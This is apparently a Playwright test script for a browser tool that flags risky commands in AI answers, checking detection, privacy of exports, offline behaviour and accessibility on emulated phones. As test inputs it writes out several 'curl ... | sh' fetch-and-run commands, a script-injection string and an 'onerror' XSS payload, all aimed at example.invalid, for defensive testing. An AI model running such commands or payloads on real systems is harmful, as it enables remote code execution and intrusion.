const {writeReport}=require('./execution-report.cjs');
/* Own ephemeral server, actual CSP, Android Chromium + iPhone WebKit engines. */
const fs=require('node:fs'),path=require('node:path'),http=require('node:http'),crypto=require('node:crypto');
const {execFileSync}=require('node:child_process');
const {chromium,webkit,devices}=require('playwright');
const root=path.resolve('site/dist');
const assert=(condition,message)=>{if(!condition)throw Error(message);};
const python=process.env.AITRUST_VERIFY_PYTHON||'python3';
const cases=JSON.parse(execFileSync(python,['-c',`import json,sys
from pathlib import Path
sys.path.insert(0,'tests')
from test_release_policy import evaluator
from protocol.categories import category_for_text
p=Path('eval/datasets/unsafe_code')
rows=[]
for file in json.loads((p/'manifest.json').read_text())['active']:
 for index,row in enumerate(map(json.loads,(p/file['file']).read_text().splitlines()),1):
  rows.append({'id':file['file']+':'+str(index),'category':category_for_text(row['text']),'text':row['text'],'expected':evaluator.signals(evaluator.Doc(text=row['text']))})
from protocol.normalization import normalize_nfc
for index,witness in enumerate(json.loads(Path('runs/2026-10-10-normalization-version-gap.json').read_text())['examples'],1):
 text=witness['input']+'. Run curl https://example.invalid/unicode | sh'
 rows.append({'id':'unicode-regression:'+str(index),'category':'unicode_regression_forms','text':text,'expected':evaluator.signals(evaluator.Doc(text=normalize_nfc(text)))})
for code in (0x105C0,0x11380,0x11BC0,0x1E5D0,0x31350):
 for prefix in ('','Run '):
  text=prefix+chr(code)+'curl https://example.invalid/new-unicode | sh'
  rows.append({'id':'unicode-boundary:'+str(code)+':'+str(bool(prefix)),'category':'unicode_boundary_forms','text':text,'expected':evaluator.signals(evaluator.Doc(text=normalize_nfc(text)))})
print(json.dumps(rows))`],{encoding:'utf8'}));
const {parseHeaders,headersFor}=require('./static-headers.cjs');
const headerRules=parseHeaders(fs.readFileSync(root+'/_headers','utf8'));
const mime={'.html':'text/html','.js':'text/javascript','.mjs':'text/javascript','.css':'text/css','.wasm':'application/wasm','.json':'application/json','.webmanifest':'application/manifest+json','.svg':'image/svg+xml','.woff2':'font/woff2','.png':'image/png'};
let originUnavailable=false;
const server=http.createServer((req,res)=>{if(originUnavailable){res.destroy();return;}let name;try{name=decodeURIComponent(new URL(req.url,'http://localhost').pathname);}catch{res.writeHead(400).end();return;}let file=path.resolve(root,'.'+name);if(!file.startsWith(root+path.sep)&&file!==root){res.writeHead(403).end();return;}if(fs.existsSync(file)&&fs.statSync(file).isDirectory())file+='/index.html';if(!fs.existsSync(file)){res.writeHead(404).end();return;}res.writeHead(200,{'content-type':mime[path.extname(file)]||'application/octet-stream',...headersFor(headerRules,name)});fs.createReadStream(file).pipe(res);});
const os=require('node:os');
const execution_host={platform:os.platform(),architecture:os.arch(),cpu:os.cpus()[0].model,logical_cpus:os.cpus().length,memory_bytes:os.totalmem(),node:process.version,clock:'browser performance.now; resolution varies by engine',observation:'Execution host hardware; not simulated handset hardware'};
const manifest=JSON.parse(fs.readFileSync('site/src/device-manifest.json','utf8'));
const report={bundle_sha256:manifest.bundle_sha256,normalization_id:manifest.normalization_id,normalization_data_sha256:manifest.normalization_data_sha256,execution_host,captured_at:new Date().toISOString(),method_sha256:JSON.parse(fs.readFileSync('site/src/device-manifest.json','utf8')).method_sha256,format:'ai-trust-id-handheld-verification/v1',independent_accuracy:false,physical_device_tested:false,engines:[],errors:[]};
const workerPath='/assets/'+fs.readdirSync(root+'/assets').find(n=>/^device-worker-.*\.js$/.test(n));
const started=Date.now();
(async()=>{const {shareSummary}=await import('../site/src/share-record.js');const probe=shareSummary({state:'FINDING',text:'EXPORT_CANARY',subject:{sha256:'EXPORT_CANARY'},unknown_future_field:'EXPORT_CANARY',candidates:[{signals:[{span:[1,2],payload:'EXPORT_CANARY'}]}]},{method_sha256:'a'.repeat(64)});assert(!JSON.stringify(probe).includes('EXPORT_CANARY'),'Future fields leaked into default export');let invalid=false;try{shareSummary({state:'UNAVAILABLE'},{method_sha256:'a'.repeat(64)});}catch{invalid=true;}assert(invalid,'Invalid result exported as summary');await new Promise(r=>server.listen(0,'127.0.0.1',r));const base=process.env.AITRUST_DEVICE_URL||'http://127.0.0.1:'+server.address().port;
try{
 report.url=base;
 for(const [name,engine,device] of [['Android Chromium',chromium,devices['Pixel 7']],['iPhone WebKit',webkit,devices['iPhone 13']]]){
  const browser=await engine.launch({headless:true});
  try{
   const context=await browser.newContext({...device,acceptDownloads:true});const page=await context.newPage();const requests=[],errors=[],consoleMessages=[];page.on('console',message=>consoleMessages.push(message.text()));
   page.on('request',r=>requests.push({url:r.url(),method:r.method(),body:r.postData()}));page.on('pageerror',e=>errors.push(e.message));
   await page.goto(base+'/#person/PS');await page.getByRole('button',{name:'Check on this device',exact:true}).waitFor();
   const parityStart=Date.now();
   const measured=await page.evaluate(async({workerPath,cases})=>{
    const loadStarted=performance.now();const worker=new Worker(workerPath,{type:'module'});let sequence=0;
    try{
     await new Promise((resolve,reject)=>{const t=setTimeout(()=>reject(Error('Worker startup timed out')),45000);worker.onmessage=({data})=>{if(data.type==='ready'){clearTimeout(t);resolve();}else if(data.type==='unavailable'){clearTimeout(t);reject(Error('Worker unavailable'));}};worker.onerror=e=>{clearTimeout(t);reject(Error(e.message));};});
     const coldLoadMs=performance.now()-loadStarted;const durations=[];const results=[];for(const row of cases){const checkStarted=performance.now();results.push(await new Promise((resolve,reject)=>{const id=++sequence,t=setTimeout(()=>reject(Error('Check timeout')),5000);worker.onmessage=({data})=>{clearTimeout(t);if(data.type==='result'&&data.id===id)resolve(data.record);else reject(Error('Invalid response'));};worker.postMessage({id,text:row.text});}));durations.push(performance.now()-checkStarted);}return {results,coldLoadMs,durations};
    }finally{worker.terminate();}
   },{workerPath,cases});
   const results=measured.results;const sorted=measured.durations.toSorted((a,b)=>a-b);const samples=measured.durations.map((duration_ms,index)=>({case_id:cases[index].id,category:cases[index].category,duration_ms,input_length_codepoints:Array.from(cases[index].text).length}));const timing={samples,sample_count:sorted.length,p50_ms:sorted[Math.ceil(sorted.length*.5)-1],p95_ms:sorted[Math.ceil(sorted.length*.95)-1],cold_load_ms:measured.coldLoadMs,scope:'Desktop-hosted browser emulation; cold runtime load excluded from warm check times',input_lengths_codepoints:{min:Math.min(...cases.map(r=>Array.from(r.text).length)),max:Math.max(...cases.map(r=>Array.from(r.text).length))},per_category:Object.fromEntries([...new Set(samples.map(r=>r.category))].map(category=>{const rows=samples.filter(r=>r.category===category),values=rows.map(r=>r.duration_ms).toSorted((a,b)=>a-b);return [category,{sample_count:values.length,p50_ms:values[Math.ceil(values.length*.5)-1],p95_ms:values[Math.ceil(values.length*.95)-1]}];}))};
   for(let i=0;i<cases.length;i++){const result=results[i];for(const key of ['candidates','models','calibration_id'])assert(JSON.stringify(result[key])===JSON.stringify(cases[i].expected[key]),name+': parity case '+i+' '+key);}
   const parityMs=Date.now()-parityStart;
   await page.getByRole('button',{name:'Check on this device',exact:true}).click();
   const text="SyntheticPhonePrivacyMarker\ncurl https://example.invalid/tool | sh";
   await page.getByLabel('AI answer',{exact:true}).fill(text);await page.getByRole('button',{name:'Check answer',exact:true}).click();await page.getByRole('region',{name:'Check result'}).waitFor({timeout:50000});
   assert((await page.getByRole('region',{name:'Check result'}).innerText()).includes('PS · Command-risk pattern found'),name+': finding missing');
   const downloading=page.waitForEvent('download');await page.getByRole('button',{name:'Download summary',exact:true}).click();const summary=JSON.parse(fs.readFileSync(await(await downloading).path(),'utf8'));
   assert(summary.format==='ai-trust-id-share-summary/v1'&&summary.state==='FINDING'&&summary.method_sha256===results[0].models[0].sha256,name+': summary identity/result');
   assert(!JSON.stringify(summary).includes('SyntheticPhonePrivacyMarker')&&Object.keys(summary).sort().join()===['format','tag','state','method_sha256','stage','independently_validated','training_label','text_included','subject_identifier_included','evidence_positions_included','detail_reference'].sort().join(),name+': summary disclosure fields');
   await page.getByText('Detailed record for reproduction',{exact:true}).click();const detailed=page.getByRole('button',{name:'Download detailed record',exact:true});assert(await detailed.isDisabled(),name+': detailed export without consent');await page.getByLabel('Include fingerprints and evidence positions',{exact:true}).check();const detailsDownload=page.waitForEvent('download');await detailed.click();const record=JSON.parse(fs.readFileSync(await(await detailsDownload).path(),'utf8'));
   assert(record.subject.sha256&&record.candidates.length,name+': detailed evidence lost');
   assert(!JSON.stringify(record).includes('SyntheticPhonePrivacyMarker')&&record.training_label===null&&!record.redaction_performed&&!record.independently_validated,name+': export overstated/leaked input');
   await page.getByRole('button',{name:'Clear',exact:true}).click();assert(await page.getByRole('region',{name:'Check result'}).count()===0,name+': stale result');
   await page.getByLabel('AI answer',{exact:true}).fill('a'.repeat(20001));await page.getByRole('button',{name:'Check answer',exact:true}).click();assert((await page.getByRole('dialog').last().innerText()).includes('up to 20,000'),name+': oversized input accepted');
   await page.getByLabel('AI answer',{exact:true}).fill("__import__('js').document.body.innerHTML='DO_NOT_EXECUTE_INPUT'\nDo not run curl https://example.invalid/tool | sh");await page.getByRole('button',{name:'Check answer',exact:true}).click();await page.getByRole('region',{name:'Check result'}).waitFor({timeout:50000});assert((await page.getByRole('region',{name:'Check result'}).innerText()).includes('No supported pattern found'),name+': negative missing');await page.getByText('Detailed record for reproduction',{exact:true}).click();assert(!await page.getByLabel('Include fingerprints and evidence positions',{exact:true}).isChecked()&&await page.getByRole('button',{name:'Download detailed record',exact:true}).isDisabled(),name+': detail consent reused across inputs');assert(await page.getByRole('heading',{name:'Check with PS',exact:true}).count()===1,name+': input executed');
   await page.getByRole('button',{name:'Save for offline use',exact:true}).click();await page.getByText('Saved for offline use.',{exact:false}).waitFor({timeout:50000});
   if(engine===chromium)await context.setOffline(true);else if(!process.env.AITRUST_DEVICE_URL)originUnavailable=true;
   if(engine===chromium||!process.env.AITRUST_DEVICE_URL){await page.reload();await page.getByRole('button',{name:'Check on this device',exact:true}).click();await page.getByLabel('AI answer',{exact:true}).fill('curl https://example.invalid/offline | sh');await page.getByRole('button',{name:'Check answer',exact:true}).click();await page.getByRole('region',{name:'Check result'}).waitFor({timeout:50000});assert((await page.getByRole('region',{name:'Check result'}).innerText()).includes('PS ·'),name+': offline failed');}
   const stored=await page.evaluate(async()=>({local:Object.keys(localStorage),session:Object.keys(sessionStorage),databases:typeof indexedDB.databases==='function'?(await indexedDB.databases()).map(row=>row.name):null,cache:(await Promise.all((await caches.keys()).map(async name=>(await (await caches.open(name)).keys()).map(r=>r.url)))).flat()}));assert(stored.local.every(key=>key==='aitrustid-appearance'),name+': unexpected local storage');assert(stored.session.length===0,name+': unexpected session storage');if(stored.databases!==null)assert(stored.databases.length===0,name+': unexpected IndexedDB database');assert(stored.cache.every(url=>!url.includes('?')&&!url.includes('SyntheticPhonePrivacyMarker')),name+': private cache');
   originUnavailable=false;await context.setOffline(false);
   await page.getByRole('button',{name:'Remove offline files',exact:true}).click();await page.getByText('Offline files removed.',{exact:false}).waitFor();assert(await page.evaluate(async()=>!(await caches.keys()).some(name=>name.startsWith('aitrust-id-offline-'))),name+': offline cache not removed');
   await page.keyboard.press('Escape');await page.getByRole('button',{name:'Review test examples',exact:true}).click();
   const form={format:'ai-trust-id-blind-ps-labels/v1',reviewer_slot:1,dataset_sha256:'a'.repeat(64),method_sha256:'b'.repeat(64),gates_sha256:'c'.repeat(64),protocol_sha256:'d'.repeat(64),items:[{id:'one',text:'<img src="https://example.invalid/reviewer" onerror="alert(1)"> SyntheticReviewMarker',category:'synthetic',source:'browser engineering test',label:null,reason:''}]};
   await page.getByLabel('Reviewer file', {exact:true}).setInputFiles({name:'reviewer-1.json',mimeType:'application/json',buffer:Buffer.from(JSON.stringify(form))});await page.waitForTimeout(300);assert(await page.getByLabel('Your judgment',{exact:true}).count()===1,'Reviewer import: '+await page.getByRole('dialog').last().innerText());await page.getByLabel('Your judgment',{exact:true}).selectOption('negative');await page.getByLabel('Why?',{exact:true}).fill('Synthetic UI test, not an independent review');
   const downloadingLabels=page.waitForEvent('download');await page.getByRole('button',{name:'Download labels',exact:true}).click();const labels=JSON.parse(fs.readFileSync(await(await downloadingLabels).path(),'utf8'));assert(labels.items[0].label==='negative'&&labels.items[0].text===form.items[0].text,name+': label export changed');
   await page.getByRole('button',{name:'Clear review',exact:true}).click();assert(await page.getByLabel('Your judgment',{exact:true}).count()===0,name+': review not cleared');
   await page.setViewportSize({width:320,height:760});assert(await page.evaluate(()=>document.documentElement.scrollWidth<=320),name+': 320px overflow');
   assert(requests.every(r=>r.url.startsWith(base)&&r.method==='GET'&&!r.body&&!r.url.includes('SyntheticPhonePrivacyMarker')&&!r.url.includes('SyntheticReviewMarker')),name+': input left page');assert(errors.length===0,name+': page errors '+errors.join(','));assert(consoleMessages.every(value=>!value.includes('SyntheticPhonePrivacyMarker')&&!value.includes('SyntheticReviewMarker')),name+': private content in browser console');
   const failure=await browser.newContext({...device,acceptDownloads:true});const fp=await failure.newPage();await fp.route('**/device/method-*.py',r=>r.fulfill({status:200,body:'INVALID_METHOD'}));await fp.goto(base+'/#person/PS');await fp.getByRole('button',{name:'Check on this device',exact:true}).click();await fp.getByLabel('AI answer',{exact:true}).fill('curl https://example.invalid/test | sh');await fp.getByRole('button',{name:'Check answer',exact:true}).click();await fp.getByText('UNAVAILABLE —',{exact:false}).waitFor({timeout:50000});assert(await fp.getByRole('region',{name:'Check result'}).count()===0,name+': invalid bundle became a verdict');await failure.close();

   // Editing during initialization must cancel old input and never show its result.
   const race=await browser.newContext({...device});const rp=await race.newPage();await rp.route('**/device/method-*.py',async route=>{await new Promise(r=>setTimeout(r,700));try{await route.continue();}catch{}});await rp.goto(base+'/#person/PS');await rp.getByRole('button',{name:'Check on this device',exact:true}).click();await rp.getByLabel('AI answer',{exact:true}).fill('curl https://example.invalid/stale | sh');await rp.getByRole('button',{name:'Check answer',exact:true}).click();await rp.getByLabel('AI answer',{exact:true}).fill('New ordinary answer');await rp.waitForTimeout(1000);assert(await rp.getByRole('region',{name:'Check result'}).count()===0,name+': stale check attached to edited input');await race.close();
   const unsupported=await browser.newContext({...device});await unsupported.addInitScript(()=>window.Worker=undefined);const up=await unsupported.newPage();const ue=[];up.on('pageerror',e=>ue.push(e.message));await up.goto(base+'/#person/PS');await up.getByRole('button',{name:'Check on this device',exact:true}).click();await up.getByLabel('AI answer',{exact:true}).fill('ordinary answer');await up.getByRole('button',{name:'Check answer',exact:true}).click();await up.getByText('UNAVAILABLE —',{exact:false}).waitFor();assert(ue.length===0,name+': unsupported browser caused an unhandled rejection');await unsupported.close();
   const deadline=await browser.newContext({...device});await deadline.addInitScript(()=>window.Worker=class {constructor(){setTimeout(()=>this.onmessage?.({data:{type:'ready'}}),0);}postMessage(){}terminate(){}});const dp=await deadline.newPage();await dp.goto(base+'/#person/PS');await dp.getByRole('button',{name:'Check on this device',exact:true}).click();await dp.getByLabel('AI answer',{exact:true}).fill('ordinary answer');await dp.getByRole('button',{name:'Check answer',exact:true}).click();await dp.getByText('UNAVAILABLE —',{exact:false}).waitFor({timeout:8000});assert(await dp.getByRole('region',{name:'Check result'}).count()===0,name+': timeout became a verdict');await deadline.close();
   const accessible=await browser.newContext({...device,bypassCSP:true});const ap=await accessible.newPage();await ap.goto(base+'/#person/PS');let violations=[];for(const trigger of ['Check on this device','Review test examples']){await ap.getByRole('button',{name:trigger,exact:true}).click();await ap.addScriptTag({path:require.resolve('axe-core/axe.min.js')});const result=await ap.evaluate(()=>axe.run(document,{runOnly:{type:'tag',values:['wcag2a','wcag2aa','wcag22aa']}}));violations.push(...result.violations.map(v=>v.id));await ap.evaluate(()=>document.documentElement.style.fontSize='200%');assert(await ap.evaluate(()=>document.documentElement.scrollWidth<=innerWidth),name+': text-size overflow');await ap.keyboard.press('Escape');await ap.waitForFunction(label=>document.activeElement?.textContent===label,trigger,{timeout:2000});assert(await ap.getByRole('button',{name:trigger,exact:true}).evaluate(e=>e===document.activeElement),name+': focus not restored');}assert(violations.length===0,name+': axe violations '+violations.join(','));await accessible.close();
   report.engines.push({name,case_count:results.length,development_fixture_cases:86,unicode_version_regression_cases:41,unicode_word_boundary_cases:10,timing,full_evidence_parity:true,parity_including_runtime_ms:parityMs,offline_reload_and_check:engine===chromium||!process.env.AITRUST_DEVICE_URL,offline_removal:true,offline_transport:engine===chromium?'Playwright offline':process.env.AITRUST_DEVICE_URL?'Not exercised against public origin; local origin-outage check covers cache':'origin unavailable; WebKit offline-emulation navigation bug #42775',metadata_export:true,minimal_summary_export:true,future_fields_excluded:true,detailed_export_requires_opt_in:true,detail_consent_reset_for_new_input:true,blind_review_export:true,invalid_bundle_unavailable:true,stale_input_cancelled:true,unsupported_worker_handled:true,timeout_handled:true,axe_violations:0,text_resize_200:true,focus_restored:true,no_text_in_requests_or_cache:true,no_canary_in_browser_console:true,no_session_content_storage:true,indexeddb_enumeration_available:stored.databases!==null,indexeddb_databases:stored.databases,reflow_320:true,errors});await context.close();
  }finally{await browser.close();}
 }
 report.pass=true;
}catch(error){report.pass=false;report.errors.push(error.message);process.exitCode=1;}
finally{server.close();report.elapsed_ms=Date.now()-started;const output=process.env.AITRUST_DEVICE_REPORT||'output/verification/handheld-checks.json';writeReport(output,report);console.log(JSON.stringify(report,null,2));}
})();
